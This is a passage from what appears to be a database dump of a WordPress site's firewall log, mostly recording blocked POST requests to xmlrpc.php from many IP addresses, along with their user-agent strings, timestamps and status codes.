Safari\\/537.36\"}','CxfSpEdj0zXmIKqHwtO2BsNa',0,1679892390.5938,579,'','POST',403,0,515,0,1,'',0),('97.107.133.132',1634436484,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','ygEidl3zBIQM46CXLhFwUaTx',0,1679892396.9355,546,'','POST',403,0,515,0,1,'',0),('103.149.165.49',1737860401,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','gRfwHyepXv7ULdBjEmKClVGq',0,1679892401.6679,613,'','POST',403,0,515,0,1,'',0),('194.243.52.182',3270718646,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','y7Q6puNe9ocS5CziGthW4fnY',0,1679896978.5019,5326,'','POST',403,0,515,0,1,'',0),('152.32.234.87',2552293975,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','Ey4dxuJvAoVbcYeiN0UaR2Gk',0,1679896979.6461,4181,'','POST',403,0,515,0,1,'',0),('92.205.5.199',1556940231,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','VoZWQCyYTe5A6EzB0KP3uN2l',0,1679896988.1667,2767,'','POST',403,0,515,0,1,'',0),('65.21.147.224',1091933152,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','SyoP2L4uTZgWdxlaDcHNQ6Vj',0,1679896990.1514,1129,'','POST',403,0,515,0,1,'',0),('82.165.85.137',1386567049,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','RsqalQu7SibFE6rMzmoWPBtZ',0,1679896992.6225,706,'','POST',403,0,515,0,1,'',0),('91.134.248.235',1535572203,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','HMgs3uAESkCt1dxv0L2ehO67',0,1679897005.9444,2755,'','POST',403,0,515,0,1,'',0),('162.253.54.78',2734503502,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','U1qw9hRPilnTaA3tmFZvxH0e',0,1679901613.6906,1665,'','POST',403,0,515,0,1,'',0),('96.231.235.203',1625811915,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','294W1KCTINwqFxe6bHdnsukM',0,1679901615.0575,901,'','POST',403,0,515,0,1,'',0),('184.168.101.66',3098043714,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','oDESJu0OvpMhHmPcUx32Awn8',0,1679901616.9290,578,'','POST',403,0,515,0,1,'',0),('162.253.54.78',2734503502,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','O8miqQ9REAXsz05K6dD3BVTN',0,1679901622.5086,575,'','POST',403,0,515,0,1,'',0),('185.6.139.121',3104213881,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','V6sIKU27c3JOdRbPrhukBS9w',0,1679901623.5752,574,'','POST',403,0,515,0,1,'',0),('82.165.85.137',1386567049,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','xvCOaetWwldPuF9AHYX3NS87',0,1679901631.8702,554,'','POST',403,0,515,0,1,'',0),('175.41.217.33',2938755361,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.141 Safari\\/537.36\"}','kbrs7HNq0tCOwzn9fZjDxciB',0,1679901633.2601,556,'','POST',403,0,515,0,1,'',0),('200.58.110.27',3359272475,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','OvZYd219rkmoSexU4WMIRz3X',0,1679905421.4791,1734,'','POST',403,0,515,0,1,'',0),('162.253.54.78',2734503502,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','yNI63ZK9THUnh2EBJOCSa8xr',0,1679905418.5899,4963,'','POST',403,0,515,0,1,'',0),('185.182.57.16',3115727120,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','dW6XmA41FQH5Jvyu9rG8RMcz',0,1679906269.8696,3988,'','POST',403,0,515,0,1,'',0),('185.182.57.16',3115727120,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','pEhJfwakb89S5XFy0HmuMxGL',0,1679906273.0572,1282,'','POST',403,0,515,0,1,'',0),('198.71.231.8',3326600968,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','0KpNux2mQYajDIiHL7PSoGqO',0,1679906278.1242,547,'','POST',403,0,515,0,1,'',0),('64.227.108.223',1088646367,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','Y6xOg7K1Vp08aRvHob9GuzEX',0,1679906280.5338,601,'','POST',403,0,515,0,1,'',0),('94.40.87.204',1579702220,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','9XYDt26V5ywHuqhmsCcAL3en',0,1679906288.4786,549,'','POST',403,0,515,0,1,'',0),('68.178.244.46',1152578606,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','aHdINKLqZpzjR21lOCBQ0Frh',0,1679906290.4088,562,'','POST',403,0,515,0,1,'',0),('185.243.11.71',3119713095,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','g7D0nlump3rwiFYcCZ5JShtE',0,1679906294.6216,614,'','POST',403,0,515,0,1,'',0),('46.3.113.98',771977570,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','tmJ6cIf5eULn1uKpkqZVNYvh',0,1679906306.4025,696,'','POST',403,0,515,0,1,'',0),('198.71.226.45',3326599725,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','JsRMCyFUHgr1INSqAdTV7km2',0,1679912567.3039,4932,'','POST',403,0,515,0,1,'',0),('185.243.11.71',3119713095,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','rGpdUcE8kzY6AHJ0S4gbnMsi',0,1679912572.0842,1362,'','POST',403,0,515,0,1,'',0),('185.55.225.47',3107447087,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','troCFOyQkL5KRqixhd72uT8e',0,1679912572.7555,1099,'','POST',403,0,515,0,1,'',0),('198.71.231.8',3326600968,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','Qk0ePajwIg1G8qAxXJ7nTrt5',0,1679912574.0856,656,'','POST',403,0,515,0,1,'',0),('162.0.232.117',2717968501,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','AwlcR09JFz6eQvYjCUHPf1nh',0,1679912581.2134,825,'','POST',403,0,515,0,1,'',0),('157.7.190.240',2634530544,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','TGWLUlS56tkcmM3riENdY1Va',0,1679912584.8291,911,'','POST',403,0,515,0,1,'',0),('34.172.150.73',581736009,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','WlIY4duneRNp3SPq5JXOf1bF',0,1679912585.4887,830,'','POST',403,0,515,0,1,'',0),('107.180.77.81',1806978385,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','ScGhs9XkpjnrAJ3uOeFzqHaf',0,1679912592.6053,1250,'','POST',403,0,515,0,1,'',0),('37.97.226.64',627171904,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','vOnj7LuiY3ZAEfobCGeMlsNV',0,1679912592.9617,1147,'','POST',403,0,515,0,1,'',0),('92.205.5.199',1556940231,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','jMeRX8TiKp3g2HloVCO415kn',0,1679912604.0458,643,'','POST',403,0,515,0,1,'',0),('152.32.234.87',2552293975,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','Cqd5LT4JolQDwUau2YHWN7Ej',0,1679912612.4983,1142,'','POST',403,0,515,0,1,'',0),('5.255.98.122',100622970,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','LU3Ml7864H5mJZwpiAxNEgVj',0,1679912612.8863,1112,'','POST',403,0,515,0,1,'',0),('103.149.165.49',1737860401,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','lOqMJWUzQawgjYPH3vIAs1C6',0,1679917066.4371,2813,'','POST',403,0,515,0,1,'',0),('45.119.84.18',762795026,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','OnAYrSL8vURmlDZoBTKgja5X',0,1679917069.8779,672,'','POST',403,0,515,0,1,'',0),('8.210.217.51',148035891,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','wFleWRDQgYtKC2fzErxcjh9v',0,1679917081.5027,625,'','POST',403,0,515,0,1,'',0),('89.163.140.92',1503890524,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','3gO9crNzQSDJmdWBFqvoCpT2',0,1679917102.9492,1412,'','POST',403,0,515,0,1,'',0),('213.205.38.23',3586991639,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','qI4Bk1PA6Xw90dtDYnymf2Rr',0,1679917104.5664,1906,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-G960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','JKue8SqGLZpYBgryWzdaQIfw',0,1679917112.2949,1084,'','POST',403,0,515,0,1,'',0),('185.171.24.51',3114997811,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','pEKVWAcG4uFNowODv1SayqL8',0,1679917114.4769,1489,'','POST',403,0,515,0,1,'',0),('162.0.217.116',2717964660,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','96prb3ygNqCLwPtfsEWi2nJz',0,1679917123.8499,681,'','POST',403,0,515,0,1,'',0),('51.254.29.108',872291692,'','http://cmdev-site1.com/wp-content/plugins/core-fork/index.php','','{\"1\":\"Mozilla\\/5.1 (Windows NT 6.0; WOW64) AppleWebKit\\/537.37 (KHTML, like Gecko) Chrome\\/58.0.1145.75 Safari\\/537.37\",\"2\":\"cmdev-site1.com\"}','ecv9MZjyuE48lKGUBPos37Nk',0,1679921656.3126,313,'','GET',403,0,700,0,1,'',0),('51.254.29.108',872291692,'','http://cmdev-site1.com/wp-content/plugins/core-stab/index.php','','{\"1\":\"Mozilla\\/5.1 (Windows NT 6.0; WOW64) AppleWebKit\\/537.37 (KHTML, like Gecko) Chrome\\/58.0.1145.75 Safari\\/537.37\",\"2\":\"cmdev-site1.com\"}','BLUhNQXexzZTJv6jqFpSfCu4',0,1679921730.3533,289,'','GET',403,0,700,0,1,'',0),('192.64.117.71',3225449799,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','17qxSkJ9TdnED4WueMc3ItvN',0,1679921908.3285,945,'','POST',403,0,515,0,1,'',0),('203.205.21.58',3419215162,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','05lDxUCcJjNIXAw9o1ai3sq6',0,1679921909.1673,700,'','POST',403,0,515,0,1,'',0),('200.58.111.21',3359272725,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','LrdtMce3yvEg5qn9RsNQwaGD',0,1679921914.5584,601,'','POST',403,0,515,0,1,'',0),('185.6.139.121',3104213881,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','mNtbM1DIgBz8kSZVaJ3usOxL',0,1679921917.1688,575,'','POST',403,0,515,0,1,'',0),('160.153.146.149',2694419093,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','IJmB8k237aKHDRSP1FbqsrC9',0,1679921917.9037,626,'','POST',403,0,515,0,1,'',0),('82.165.89.16',1386567952,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','EgY3CdWLaNSeZVfnOiszRjMl',0,1679921925.9685,564,'','POST',403,0,515,0,1,'',0),('185.6.139.121',3104213881,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','PUkvGZRlK1Iiep0smzgLM6Ty',0,1679921940.9386,1441,'','POST',403,0,515,0,1,'',0),('89.46.107.190',1496214462,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:40.0) Gecko\\/20100101 Firefox\\/40.0\"}','9TJvA0ZG2q4n1Dtc5iagfmOr',0,1679921947.5371,602,'','POST',403,0,515,0,1,'',0),('203.205.21.58',3419215162,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','shuBTrKqb1PwNUzEeiRAYoW6',0,1679921952.0946,576,'','POST',403,0,515,0,1,'',0),('94.40.87.204',1579702220,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','Ej0nmDxsUypIMocbHlGBXqVO',0,1679926649.4411,3486,'','POST',403,0,515,0,1,'',0),('157.245.192.133',2650128517,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','9IzBUgOXyafeMTd26ixmFAS3',0,1679926651.0871,2676,'','POST',403,0,515,0,1,'',0),('203.205.21.58',3419215162,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','L0sUThZ1xJufrVkvjab4c7n6',0,1679926668.1687,2657,'','POST',403,0,515,0,1,'',0),('35.187.109.22',599485718,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','DLq1ksPgfKEnFpTBiMlIJctO',0,1679926679.8876,597,'','POST',403,0,515,0,1,'',0),('8.210.217.51',148035891,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','4DJRKAdGFX2EM3wHVQlnZSYu',0,1679926712.1816,2732,'','POST',403,0,515,0,1,'',0),('185.231.59.72',3118938952,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','BvlNHAzU8WT0bg9pdt5ISC2u',0,1679926712.9289,1985,'','POST',403,0,515,0,1,'',0),('203.205.21.58',3419215162,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','eoME2Jt7u1GFBmbh65sSVidp',0,1679926719.9722,643,'','POST',403,0,515,0,1,'',0),('103.149.165.49',1737860401,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','R0smbn2V5itAZIODXgH6y4Cf',0,1679926720.7996,600,'','POST',403,0,515,0,1,'',0),('69.174.53.190',1169044926,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','WDc6txsJri129hnkdRNby7OY',0,1679926733.2124,633,'','POST',403,0,515,0,1,'',0),('198.71.235.41',3326602025,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','h6AUo5wM3j7icmRgBGlxzTse',0,1679931140.3242,4401,'','POST',403,0,515,0,1,'',0),('45.119.84.18',762795026,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','OIZKAfUmT70nopXr4JHiVgbc',0,1679931147.8644,550,'','POST',403,0,515,0,1,'',0),('164.92.115.99',2757522275,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','HZABg83T9EC1JyN6XptW5lMs',0,1679931148.5974,619,'','POST',403,0,515,0,1,'',0),('8.210.217.51',148035891,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','IJYV9NjFg7TdkmnBQh8fHxOs',0,1679931156.0066,582,'','POST',403,0,515,0,1,'',0),('103.133.215.217',1736824793,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','f543hwrduU7ekNjmPHpFVRWq',0,1679931177.8061,600,'','POST',403,0,515,0,1,'',0),('51.68.11.207',860097487,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','FMkubmnYZlg1x0vtRBzLreaJ',0,1679931180.4255,571,'','POST',403,0,515,0,1,'',0),('67.198.116.43',1137079339,'','http://cmdev-site1.com/wp-admin/admin-ajax.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\",\"2\":\"http:\\/\\/cmdev-site1.com\\/wp-admin\\/plugins.php\"}','ACsEebDTWBjI4F0g9GZc8nxf',0,1679932631.4287,558,'','POST',200,0,500,0,1,'',510),('198.71.231.8',3326600968,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','agWhpONlE9frvBnzFbV8q0uK',0,1679934091.3612,1592,'','POST',403,0,515,0,1,'',0),('5.23.50.101',85406309,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','zRTslvcUg6GbD3Mi5oqHNmtB',0,1679934089.6918,3810,'','POST',403,0,515,0,1,'',0),('89.46.106.145',1496214161,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','LKV8P5jbi03eRcyHWMhdOoxZ',0,1679934103.3565,562,'','POST',403,0,515,0,1,'',0),('144.76.57.230',2420914662,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','OTNEA8w23dQmD9kFRIP1v7nX',0,1679934104.4133,1048,'','POST',403,0,515,0,1,'',0),('162.14.102.253',2718852861,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','dFC0JgMw92EPZRSx1zj3cXUI',0,1679934104.9547,896,'','POST',403,0,515,0,1,'',0),('203.205.21.58',3419215162,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','Hf6FP2GulxNwa3hro1OIgjEZ',0,1679934119.2129,605,'','POST',403,0,515,0,1,'',0),('94.40.87.204',1579702220,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','S9P4no0mxL6yXrOCNc7QWklg',0,1679934123.7964,563,'','POST',403,0,515,0,1,'',0),('92.205.5.199',1556940231,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','Mzjfgv12Uc3V0hyt8olxqrQu',0,1679934128.3754,540,'','POST',403,0,515,0,1,'',0),('96.231.235.203',1625811915,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','v7UhkQ8eVKySWEAzfgRmjJus',0,1679939364.0471,2304,'','POST',403,0,515,0,1,'',0),('149.102.159.169',2506530729,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','u0TeQMWKa7UR5nJHAFfBjq3X',0,1679939364.1571,2303,'','POST',403,0,515,0,1,'',0),('157.245.192.133',2650128517,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','fSZ7eR4nJqWbawVFctvgTL0C',0,1679939361.8293,5016,'','POST',403,0,515,0,1,'',0),('156.245.57.130',2633316738,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 